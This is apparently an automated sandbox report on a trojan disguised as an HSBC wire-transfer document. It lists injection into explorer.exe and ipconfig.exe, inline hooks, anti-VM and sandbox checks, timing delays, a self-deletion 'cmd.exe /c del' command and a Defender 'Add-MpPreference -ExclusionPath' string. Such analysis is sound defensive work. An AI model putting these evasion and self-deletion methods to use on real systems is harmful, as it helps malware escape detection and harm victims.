          Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.290259549.00000000038AD000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameUI.dll@ vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exe, 00000006.00000000.286928086.0000000000C76000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameISectionEnt.exe. vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346567819.000000000171F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346749422.00000000018AF000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346869714.0000000001997000.00000040.00020000.sdmp | Binary or memory string: OriginalFilenameipconfig.exej% vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exe | Binary or memory string: OriginalFilenameISectionEnt.exe. vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: HSBC ... Wire Transfer Copy.exeVirustotal: Detection: 16%
          Source: HSBC ... Wire Transfer Copy.exeReversingLabs: Detection: 40%
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeFile read: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe:Zone.IdentifierJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown | Process created: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe "C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe"
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Process created: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Windows\SysWOW64\ipconfig.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\HSBC ... Wire Transfer Copy.exe.log
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@7/1@3/2
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6888:120:WilError_01
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
          Source: HSBC ... Wire Transfer Copy.exe | String found in binary or memory: /ISectionEnt;component/views/addbook.xaml
          Source: HSBC ... Wire Transfer Copy.exe | String found in binary or memory: views/addbook.baml
          Source: HSBC ... Wire Transfer Copy.exe | String found in binary or memory: views/addcustomer.baml
          Source: HSBC ... Wire Transfer Copy.exe | String found in binary or memory: /ISectionEnt;component/views/addcustomer.xaml
          Source: HSBC ... Wire Transfer Copy.exe | String found in binary or memory: S/ISectionEnt;component/views/addbook.xamli/ISectionEnt;component/views/borrowfrombookview.xaml_/ISectionEnt;component/views/borrowingview.xamlY/ISectionEnt;component/views/changebook.xamla/ISectionEnt;component/views/changecustomer.xaml]/ISectionEnt;component/views/customerview.xamla/ISectionEnt;component/views/deletecustomer.xamlW/ISectionEnt;component/views/errorview.xaml[/ISectionEnt;component/views/smallextras.xaml[/ISectionEnt;component/views/addcustomer.xaml
          Source: HSBC ... Wire Transfer Copy.exe | String found in binary or memory: *images/booksimage.jpg$views/addbook.baml1J,views/addcustomer.baml
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: HSBC ... Wire Transfer Copy.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: HSBC ... Wire Transfer Copy.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: ipconfig.pdb source: HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346858842.0000000001990000.00000040.00020000.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346858842.0000000001990000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346567819.000000000171F000.00000040.00000001.sdmp, HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, ipconfig.exe, 00000010.00000002.548146108.0000000003620000.00000040.00000001.sdmp, ipconfig.exe, 00000010.00000002.549823291.000000000373F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: HSBC ... Wire Transfer Copy.exe, HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346567819.000000000171F000.00000040.00000001.sdmp, HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, ipconfig.exe, ipconfig.exe, 00000010.00000002.548146108.0000000003620000.00000040.00000001.sdmp, ipconfig.exe, 00000010.00000002.549823291.000000000373F000.00000040.00000001.sdmp

          Data Obfuscation:

          .NET source code contains potential unpacker
          Source: HSBC ... Wire Transfer Copy.exe, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.HSBC ... Wire Transfer Copy.exe.3e0000.0.unpack, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.HSBC ... Wire Transfer Copy.exe.3e0000.0.unpack, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.c00000.9.unpack, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.2.HSBC ... Wire Transfer Copy.exe.c00000.1.unpack, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.c00000.5.unpack, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.c00000.1.unpack, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.c00000.3.unpack, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.c00000.0.unpack, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.c00000.7.unpack, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.c00000.2.unpack, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 0_2_003E92F5 push ds; ret
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 0_2_003E9361 push ds; retf
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 0_2_003E9347 push ds; ret
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0041EA76 push 1501B1CAh; retf
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_00416C20 push C10A24AAh; iretd
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_004164D3 push eax; retf
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0041D4B5 push eax; ret
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0041D56C push eax; ret
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0041D502 push eax; ret
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0041D50B push eax; ret
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_00C092F5 push ds; ret
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_00C09347 push ds; ret
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_00C09361 push ds; retf
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0167D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0369D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_02C7EA76 push 1501B1CAh; retf
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_02C764D3 push eax; retf
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_02C7D4B5 push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_02C76C20 push C10A24AAh; iretd
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_02C7EDAE pushad ; ret
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_02C7D56C push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_02C7D502 push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_02C7D50B push eax; ret
          Source: initial sample | Static PE information: section name: .text entropy: 7.86790735928

          Persistence and Installation Behavior:

          Uses ipconfig to lookup or modify the Windows network settings
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exe | User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x87 0x7E 0xEF
          Self deletion via cmd delete
          Source: C:\Windows\SysWOW64\ipconfig.exe | Process created: /c del "C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe"
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\ipconfig.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 0.2.HSBC ... Wire Transfer Copy.exe.2908f34.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.HSBC ... Wire Transfer Copy.exe.299b518.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.289914483.00000000028A1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.290051006.000000000296B000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: HSBC ... Wire Transfer Copy.exe PID: 6892, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.289914483.00000000028A1000.00000004.00000001.sdmp, HSBC ... Wire Transfer Copy.exe, 00000000.00000002.290051006.000000000296B000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.289914483.00000000028A1000.00000004.00000001.sdmp, HSBC ... Wire Transfer Copy.exe, 00000000.00000002.290051006.000000000296B000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 0000000002C69904 second address: 0000000002C6990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 0000000002C69B7E second address: 0000000002C69B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -4611686018427385s >= -30000s
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -240000s >= -30000s
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7036Thread sleep count: 985 > 30
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -239841s >= -30000s
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7036Thread sleep count: 1635 > 30
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 6896Thread sleep time: -36646s >= -30000s
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -239686s >= -30000s
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -239577s >= -30000s
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -239452s >= -30000s
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -239342s >= -30000s
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -239233s >= -30000s
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -239124s >= -30000s
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -238999s >= -30000s
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -238889s >= -30000s
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -238781s >= -30000s
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -238670s >= -30000s
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -238560s >= -30000s
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -238453s >= -30000s
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -238343s >= -30000s
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -238000s >= -30000s
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -237203s >= -30000s
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -236703s >= -30000s
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -236534s >= -30000s
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -236406s >= -30000s
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 6936Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 6628Thread sleep time: -48000s >= -30000s
          Source: C:\Windows\SysWOW64\ipconfig.exe TID: 6264Thread sleep time: -36000s >= -30000s
          Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_00409AB0 rdtsc
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 240000
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 239841
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 239686
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 239577
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 239452
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 239342
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 239233
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 239124
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 238999
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 238889
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 238781
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 238670
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 238560
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 238453
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 238343
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 238000
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 237203
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 236703
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 236534
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 236406
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeWindow / User API: threadDelayed 985
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeWindow / User API: threadDelayed 1635
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 240000
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 239841
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 36646
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 239686
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 239577
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 239452
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 239342
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 239233
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 239124
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 238999
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 238889
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 238781
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 238670
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 238560
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 238453
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 238343
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 238000
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 237203
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 236703
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 236534
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 236406
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 922337203685477
          Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.290051006.000000000296B000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: explorer.exe, 0000000C.00000000.303809038.000000000EE50000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}1
          Source: explorer.exe, 0000000C.00000000.303809038.000000000EE50000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b1
          Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.290051006.000000000296B000.00000004.00000001.sdmp | Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 0000000C.00000000.301310176.00000000086C9000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.290051006.000000000296B000.00000004.00000001.sdmp | Binary or memory string: vmware
          Source: explorer.exe, 0000000C.00000000.335138574.0000000008778000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
          Source: explorer.exe, 0000000C.00000000.330618506.00000000067C2000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000C.00000000.301310176.00000000086C9000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
          Source: explorer.exe, 0000000C.00000000.330618506.00000000067C2000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
          Source: explorer.exe, 0000000C.00000000.301310176.00000000086C9000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.290051006.000000000296B000.00000004.00000001.sdmp | Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_00409AB0 rdtsc
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Process token adjusted: Debug
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0162C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0162B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0162B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0164B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0164B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01644120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01644120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01644120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01644120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01644120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0165513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0165513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01629100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01629100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01629100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016B41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0162B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0162B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0162B1E1 mov eax, dword ptr fs:[00000030h]
